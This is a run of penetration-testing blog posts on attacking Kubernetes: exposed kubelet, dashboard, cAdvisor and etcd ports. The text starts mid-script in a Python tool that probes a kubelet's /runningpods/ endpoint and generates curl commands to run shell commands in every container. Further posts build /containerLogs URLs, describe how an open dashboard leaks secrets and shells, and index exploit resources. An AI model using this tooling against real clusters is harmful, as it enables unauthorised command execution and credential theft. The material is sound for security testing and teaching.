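    """One curl line per container; --data-urlencode keeps spaces and shell characters intact."""
    return [
        f'curl -k -XPOST "{run_url(node, ns, pod, c)}" --data-urlencode "cmd={cmd}"'
        for ns, pod, c in targets_from_runningpods(body)
    ]


def probe_runningpods(node, timeout=5):
    """Live GET of /runningpods/ with TLS verification off (the curl -k equivalent).

    Returns (status, body). This is a network call, so the offline demo below does not use it.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(f"https://{node}:10250/runningpods/")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    node = "k8s-node-1"  # constructed node name
    samples = [
        (403, "Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)"),
        (401, "Unauthorized"),
        (200, SAMPLE_RUNNINGPODS),
    ]
    for status, body in samples:
        print(status, "=>", classify_kubelet_response(status, body))
    for line in curl_commands(node, SAMPLE_RUNNINGPODS, "ls -la /"):
        print(line)
```

<div>
Run it as-is for the offline demo. Against a real node, feed <code>probe_runningpods(node)</code> into <code>classify_kubelet_response</code> first: only the "open" case is worth following up with the generated curl lines, the other two tell you which credential you are missing.</div>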
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-44332582894145729622019-01-14T16:31:00.001-05:002019-01-14T16:31:05.375-05:00Kubernetes: List of ports<span style="font-family: inherit;">Other Kubernetes ports</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div style="background-color: white; box-sizing: border-box; color: #333333; margin-bottom: 10px;">
<span style="box-sizing: border-box; font-family: inherit;">What are some of the visible ports used in Kubernetes?</span><br />
<div style="font-size: 14px;">
<span style="font-family: inherit;"><br /></span></div>
</div>
<div style="background-color: white; box-sizing: border-box; color: #333333; margin-bottom: 10px;">
<ul>
<li><span style="font-family: inherit;">44134/tcp - Helmtiller, weave, calico</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">10250/tcp - kubelet (kublet exploit)</span></li>
<ul>
<li><span style="font-family: inherit;">No authN, completely open</span></li>
<li><span style="font-family: inherit;">/pods</span></li>
<li><span style="font-family: inherit;">/runningpods</span></li>
<li><span style="font-family: inherit;">/containerLogs</span></li>
</ul>
<li><span style="box-sizing: border-box; font-family: inherit;">10255/tcp - kublet port (read-only)</span></li>
<ul>
<li><span style="box-sizing: border-box; font-family: inherit;">/stats</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">/metrics</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">/pods</span></li>
</ul>
<li><span style="box-sizing: border-box; font-family: inherit;">4194/tcp - cAdvisor</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">2379/tcp - etcd (see it on other ports though)</span></li>
<ul>
<li><span style="font-family: inherit;">Etcd holds all the configs</span></li>
<li><span style="font-family: inherit;">Config storage</span></li>
</ul>
<li><span style="font-family: inherit;">30000 - dashboard</span></li>
<li><span style="font-family: inherit;">443/6443 - api</span></li>
</ul>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-39203133072026638332019-01-11T09:00:00.001-05:002019-01-11T09:00:00.434-05:00Kubernetes: Kubernetes Dashboard<br />
Tesla was <a href="https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/" target="_blank">famously hacked</a> for leaving this open with no authentication (the attackers used the cluster to mine cryptocurrency). It's pretty rare to find it exposed externally now, but it's useful to know what it is and what you can do with it.<br />
<br />
Usually found on port 30000 when it has been exposed as a NodePort<br />
<br />
kube-hunter finding for it:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">Vulnerabilities</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+-----------------------+---------------+----------------------+----------------------+------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+-----------------------+---------------+----------------------+----------------------+------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:30000 | Remote Code | Dashboard Exposed | All oprations on the | nodes: pach-okta |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Execution | | cluster are exposed | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+-----------------------+---------------+----------------------+----------------------+------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span><span style="font-family: inherit; font-size: xx-small;">Why do you care? The dashboard acts with whatever service account it runs as, and in the exposed deployments you come across (the kube-hunter finding above is the usual case) that is usually cluster-admin: every pod and secret in the cluster, plus a shell in any container, from a web browser instead of the command line.</span><br />
<span style="font-family: inherit; font-size: xx-small;"><br /></span>
<span style="font-family: inherit; font-size: xx-small;">Screenshots of what it looks like:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3JaFvtiX2Ga4sDigrVm69aiM1baUFjuNPh2zW3QElozlBNbLOW2nlEb3tV7z4dDnVHDU4NUaclewHrr2-Lb4jlfqs5vkFJMQQ8NNYtCLF26UZAhxRvWl41ZJLeTnERCT0E3ZjkU4Jf48/s1600/dashboard1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1008" data-original-width="1600" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3JaFvtiX2Ga4sDigrVm69aiM1baUFjuNPh2zW3QElozlBNbLOW2nlEb3tV7z4dDnVHDU4NUaclewHrr2-Lb4jlfqs5vkFJMQQ8NNYtCLF26UZAhxRvWl41ZJLeTnERCT0E3ZjkU4Jf48/s320/dashboard1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
viewing secrets</div>
<span style="font-family: inherit; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://d33wubrfki0l68.cloudfront.net/349824f68836152722dab89465835e604719caea/6e0b7/images/docs/ui-dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="478" data-original-width="800" height="238" src="https://d33wubrfki0l68.cloudfront.net/349824f68836152722dab89465835e604719caea/6e0b7/images/docs/ui-dashboard.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
utilization</div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://d33wubrfki0l68.cloudfront.net/767cfea1ac5847b732e40ddd1ea13e638b679f8f/7be79/images/docs/ui-dashboard-logs-view.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="478" data-original-width="800" height="238" src="https://d33wubrfki0l68.cloudfront.net/767cfea1ac5847b732e40ddd1ea13e638b679f8f/7be79/images/docs/ui-dashboard-logs-view.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
logs</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://user-images.githubusercontent.com/608862/29508542-d7e67470-864c-11e7-838c-90bbb9c09daa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="315" data-original-width="800" height="156" src="https://user-images.githubusercontent.com/608862/29508542-d7e67470-864c-11e7-838c-90bbb9c09daa.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
shells</div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-4147282203286078582019-01-11T09:00:00.000-05:002019-01-11T09:00:03.332-05:00Kubernetes: Kubelet API containerLogs endpoint<br />
<span style="font-family: inherit;">How to get the info that kube-hunter reports for open /containerLogs endpoint</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">Vulnerabilities</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------+-------------+------------------+----------------------+----------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------+-------------+------------------+----------------------+----------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | Logs | running container | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | are using the | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | exposed | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | /containerLogs | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | endpoint | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------+-------------+------------------+----------------------+----------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: inherit;">First step: grab the output from /runningpods/ (example below):</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ3E2BnNu1hnCtVNUsb2jQhi_ZgzFFpg-2ZRfosj7SpmINjD8SHNPwr0eYj-s2RwpMroCyt2Yyxo96QakAqfuCORZQeqgGa2wfgrpGP3kQJTOuZRb0vtjqUOR-2hNzBZ7k87a490l5yNM/s1600/runningpods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="483" data-original-width="1600" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ3E2BnNu1hnCtVNUsb2jQhi_ZgzFFpg-2ZRfosj7SpmINjD8SHNPwr0eYj-s2RwpMroCyt2Yyxo96QakAqfuCORZQeqgGa2wfgrpGP3kQJTOuZRb0vtjqUOR-2hNzBZ7k87a490l5yNM/s640/runningpods.png" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">You'll need the <i>namespace</i>, <i>pod name </i>and <i>container name</i>.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Thus, given the runningpods output below:</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">{"metadata":{"name":"<b>monitoring-influxdb-grafana-v4-6679c46745-zhvjw</b>","namespace":"<b>kube-system</b>","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"<b>grafana</b>","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"<b>influxdb</b>","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},</span></pre>
<br />
<span style="font-family: inherit;">turns into:</span><br />
<br />
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana</span></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkVeMMHhBhT-H6kczphaOnyBcUHB5Dg6OKvhAdkwBUvlV8DocP_xQs4-8AXMP6V_1h9q_efjhbVLEGTRJnQyYSCdsOWnUtPgkoqjzdJ0QLuUBzNavIuSfjdN1l4LaSILKPAkjQsWTCuL4/s1600/grafana.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="580" data-original-width="1600" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkVeMMHhBhT-H6kczphaOnyBcUHB5Dg6OKvhAdkwBUvlV8DocP_xQs4-8AXMP6V_1h9q_efjhbVLEGTRJnQyYSCdsOWnUtPgkoqjzdJ0QLuUBzNavIuSfjdN1l4LaSILKPAkjQsWTCuL4/s640/grafana.png" width="640" /></a></div>
<br />
<span style="font-family: inherit;">and</span><br />
<br />
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb</span></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZr-SXC0SggoBSlNutC1NLZPifxTukWARGBKWty_4Zi8EZ7R31_YYSVcRO3lNhuUOSYu3XSWvI8FD1xIV6MznYnrUAasrfqTAsq4HAGRNrCKw_-qiEOoieFP3ibA0MKIl-Wo2ibYdQKpY/s1600/influxdb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="842" data-original-width="1600" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZr-SXC0SggoBSlNutC1NLZPifxTukWARGBKWty_4Zi8EZ7R31_YYSVcRO3lNhuUOSYu3XSWvI8FD1xIV6MznYnrUAasrfqTAsq4HAGRNrCKw_-qiEOoieFP3ibA0MKIl-Wo2ibYdQKpY/s640/influxdb.png" width="640" /></a></div>
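As an added example (not code from the post), the path construction above in Python: it reads the PodList JSON that /runningpods/ returns and emits the /containerLogs/&lt;namespace&gt;/&lt;pod&gt;/&lt;container&gt; paths, so you can see exactly which logs a kubelet that answers anonymously on 10250 would serve and re-check those paths once authentication is enforced. The kubelet address 1.2.3.4:10250 is the post's placeholder, the first pod is the one shown in the post and the second pod in the sample is constructed.

```python
"""Turn kubelet /runningpods/ output into /containerLogs paths.

Added example, not from the original post. The sample PodList below is
constructed: the first pod is the one shown in the post, the second is
made up to show that every pod and every container is covered.
"""
from __future__ import annotations

import json
from typing import Iterator

# Constructed sample in the shape the kubelet returns from /runningpods/.
SAMPLE_RUNNINGPODS = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "metadata": {},
    "items": [
        {
            "metadata": {
                "name": "monitoring-influxdb-grafana-v4-6679c46745-zhvjw",
                "namespace": "kube-system",
                "uid": "0d22cdad-06e5-11e9-a7f3-6ac885fbc092",
                "creationTimestamp": None,
            },
            "spec": {
                "containers": [
                    {"name": "grafana", "resources": {}},
                    {"name": "influxdb", "resources": {}},
                ]
            },
        },
        {   # constructed second pod
            "metadata": {"name": "example-app-7d9c4-abcde", "namespace": "default"},
            "spec": {"containers": [{"name": "app"}]},
        },
    ],
})


def iter_containers(runningpods_json: str) -> Iterator[tuple[str, str, str]]:
    """Yield (namespace, pod name, container name) for every container.

    A pod without a namespace or name is skipped instead of producing a
    malformed path; containers without a name are skipped the same way.
    """
    doc = json.loads(runningpods_json)
    for pod in doc.get("items", []):
        meta = pod.get("metadata", {})
        namespace, name = meta.get("namespace"), meta.get("name")
        if not namespace or not name:
            continue
        for container in pod.get("spec", {}).get("containers", []):
            cname = container.get("name")
            if cname:
                yield namespace, name, cname


def container_log_paths(runningpods_json: str) -> list[str]:
    """Return the /containerLogs/<namespace>/<pod>/<container> paths."""
    return [f"/containerLogs/{ns}/{pod}/{c}"
            for ns, pod, c in iter_containers(runningpods_json)]


def container_log_urls(runningpods_json: str,
                       kubelet: str = "1.2.3.4:10250") -> list[str]:
    """Prefix each path with the kubelet's HTTPS address (the post's placeholder)."""
    return [f"https://{kubelet}{p}" for p in container_log_paths(runningpods_json)]


if __name__ == "__main__":
    for url in container_log_urls(SAMPLE_RUNNINGPODS):
        print(url)
```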
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-85831037128157416352019-01-07T09:00:00.000-05:002019-07-21T12:57:27.212-04:00Kubernetes: Master Post<span style="font-family: inherit;">I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If I'm missing blog posts or useful resources, ping me here or on Twitter.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Talks you should watch if you are interested in Kubernetes:</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<b>Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman</b><br />
<a href="https://www.youtube.com/watch?v=vTgQLzeBfRU" target="_blank"><span style="font-family: inherit;">https://www.youtube.com/watch?v=vTgQLzeBfRU</span></a><br />
<a href="https://github.com/bgeesaman/" target="_blank"><span style="font-family: inherit;">https://github.com/bgeesaman/</span></a><br />
<span style="font-family: inherit;"><a href="https://github.com/bgeesaman/hhkbe" target="_blank">https://github.com/bgeesaman/hhkbe</a> [demos for the talk above]</span><br />
<span style="font-family: inherit;"><a href="https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf" target="_blank">https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf</a> [slide deck]</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<b>Perfect Storm Taking the Helm of Kubernetes Ian Coldwater</b><br />
<a href="https://www.youtube.com/watch?v=1k-GIDXgfLw" target="_blank"><span style="font-family: inherit;">https://www.youtube.com/watch?v=1k-GIDXgfLw</span></a><br />
<span style="font-family: inherit;"><br /></span>
<br />
<b>A Hacker's Guide to Kubernetes and the Cloud - Rory McCune</b><br />
<a href="https://www.youtube.com/watch?v=dxKpCO2dAy8" target="_blank">https://www.youtube.com/watch?v=dxKpCO2dAy8</a><br />
<br />
<b>Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes</b><br />
<a href="https://www.youtube.com/watch?v=ohTq0no0ZVU" target="_blank"><span style="font-family: inherit;">https://www.youtube.com/watch?v=ohTq0no0ZVU</span></a><br />
<br />
<br />
Blog posts by others:<br />
<br />
<a href="https://techbeacon.com/hackers-guide-kubernetes-security" target="_blank">https://techbeacon.com/hackers-guide-kubernetes-security</a><br />
<a href="https://elweb.co/the-security-footgun-in-etcd/" target="_blank">https://elweb.co/the-security-footgun-in-etcd/</a><br />
<a href="https://www.4armed.com/blog/hacking-kubelet-on-gke/" target="_blank">https://www.4armed.com/blog/hacking-kubelet-on-gke/</a><br />
<a href="https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/" target="_blank">https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/</a><br />
<a href="https://www.4armed.com/blog/hacking-digitalocean-kubernetes/" target="_blank">https://www.4armed.com/blog/hacking-digitalocean-kubernetes/</a><br />
<a href="https://github.com/freach/kubernetes-security-best-practice" target="_blank">https://github.com/freach/kubernetes-security-best-practice</a><br />
<a href="https://neuvector.com/container-security/kubernetes-security-guide/" target="_blank">https://neuvector.com/container-security/kubernetes-security-guide/</a><br />
<a href="https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066" target="_blank">https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066</a><br />
<a href="https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html" target="_blank">https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html</a><br />
<a href="https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/" target="_blank">https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/</a><br />
<a href="https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/" target="_blank">https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/</a><br />
<a href="https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/" target="_blank">https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/</a><br />
<a href="https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/" target="_blank">https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/</a><br />
<a href="https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/" target="_blank">https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/</a><br />
<a href="https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/" target="_blank">https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/</a><br />
<br />
<br />
Auditing tools<br />
<br />
<a href="https://github.com/Shopify/kubeaudit" target="_blank">https://github.com/Shopify/kubeaudit</a><br />
<a href="https://github.com/aquasecurity/kube-bench" target="_blank">https://github.com/aquasecurity/kube-bench</a><br />
<a href="https://github.com/aquasecurity/kube-hunter" target="_blank">https://github.com/aquasecurity/kube-hunter</a><br />
<br />
CVE-2018-1002105 resources<br />
<br />
<a href="https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb" target="_blank">https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb</a><br />
<a href="https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/" target="_blank">https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/</a><br />
<a href="https://github.com/gravitational/cve-2018-1002105" target="_blank">https://github.com/gravitational/cve-2018-1002105</a><br />
<a href="https://github.com/evict/poc_CVE-2018-1002105" target="_blank">https://github.com/evict/poc_CVE-2018-1002105</a><br />
<br />
CG Posts:<br />
<br />
Open Etcd: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html</a><br />
Etcd with kube-hunter: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html</a><br />
cAdvisor: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html</a><br />
<br />
Kubernetes ports: <a href="https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html</a><br />
Kubernetes dashboards: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html</a><br />
Kubelet 10255: <a href="https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html</a><br />
Kubelet 10250<br />
- Container Logs: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html</a><br />
- Getting shellz 1: <a href="https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html</a><br />
- Getting shellz 2: <a href="https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html</a><br />
<br />
<br />
Cloud Metadata Urls and Kubernetes<br />
<br />
<br />
-I'll update as they get posted<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-26415455500710084312019-01-06T09:00:00.002-05:002019-01-07T09:41:34.478-05:00Kubernetes: cAdvisor<span style="font-family: inherit;"><b style="background-color: white; color: #222222; font-size: 16px;">"cAdvisor</b><span style="background-color: white; color: #222222; font-size: 16px;"> (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."</span></span><br />
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;">Runs on port 4194.</span></span><br />
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;">Links:</span></span><br />
<span style="font-family: inherit;"><a href="https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/" target="_blank">https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/</a></span><br />
<span style="font-family: inherit;"><a href="https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/" target="_blank">https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/</a></span><br />
<br />
What do you get?<br />
<br />
Information disclosure: resource metrics and spec details for the running containers.<br />
<br />
Example request to hit the API and dump data:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "monaco" , "menlo" , "consolas" , "courier new" , monospace; font-size: 12.6px; white-space: nowrap;">http://1.2.3.4:4194/api/v2.0/spec?recursive=true</span><br />
<br />
Screenshots<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHG0VFa42OGOPc8QAo3YjFrqIiMmQn3Y1TZs1FvXp-5V8WJPOCzebS9YfYS1r46SvsuzWx9UjWbL8LRqofvMvNWKSmUjT_hYcwkCeQeKBkWHtLFt2Wtxta01rl8XewiPRJ_IVpKFKEs7c/s1600/cadvisor1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="818" data-original-width="1600" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHG0VFa42OGOPc8QAo3YjFrqIiMmQn3Y1TZs1FvXp-5V8WJPOCzebS9YfYS1r46SvsuzWx9UjWbL8LRqofvMvNWKSmUjT_hYcwkCeQeKBkWHtLFt2Wtxta01rl8XewiPRJ_IVpKFKEs7c/s400/cadvisor1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqGfimubYxxvr2lOerREzcQoYet7mOp3aFGpT9RmLKjqzSBcds_KGJHL_Q_37Fdo7mNFmoRlYxkBrMTS049aQ0gJbtHmTrlPsKxoabZNvEZuPCVUf-CT1Evs3Q3OEu75xTf4XiZlgQqdg/s1600/cadvisor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="923" data-original-width="1600" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqGfimubYxxvr2lOerREzcQoYet7mOp3aFGpT9RmLKjqzSBcds_KGJHL_Q_37Fdo7mNFmoRlYxkBrMTS049aQ0gJbtHmTrlPsKxoabZNvEZuPCVUf-CT1Evs3Q3OEu75xTf4XiZlgQqdg/s400/cadvisor2.png" width="400" /></a></div>
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-43319651129676792262019-01-06T09:00:00.001-05:002019-01-07T09:41:12.410-05:00Kubernetes: open etcd <span style="font-family: inherit;">Quick post on <span style="background-color: white;">Kubernetes and open etcd (port 2379)</span></span><br />
<span style="background-color: white;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-family: inherit;">"<a href="https://coreos.com/etcd" style="background-color: white; box-sizing: border-box; letter-spacing: 0.1px; text-decoration-line: none;" target="_blank">etcd</a><span style="background-color: white; letter-spacing: 0.1px;"> is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."</span></span><br />
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;">-from: <a href="https://coreos.com/blog/introducing-the-etcd-operator.html" target="_blank">https://coreos.com/blog/introducing-the-etcd-operator.html </a></span></span><br />
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;">What this means in English is that etcd stores the current state of the Kubernetes cluster, usually including the Kubernetes tokens and passwords. If you check out the following references you can get a sense of the pain level that could potentially be involved: at minimum you get network info or running pods, and at worst credentials.</span></span><br />
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; text-size-adjust: auto;"><span style="font-family: inherit;">refs: </span></span><br />
<a href="https://techbeacon.com/hackers-guide-kubernetes-security" style="background-color: white; font-family: inherit;" target="_blank">https://techbeacon.com/hackers-guide-kubernetes-security</a><span style="background-color: white; font-family: inherit;"> </span><br />
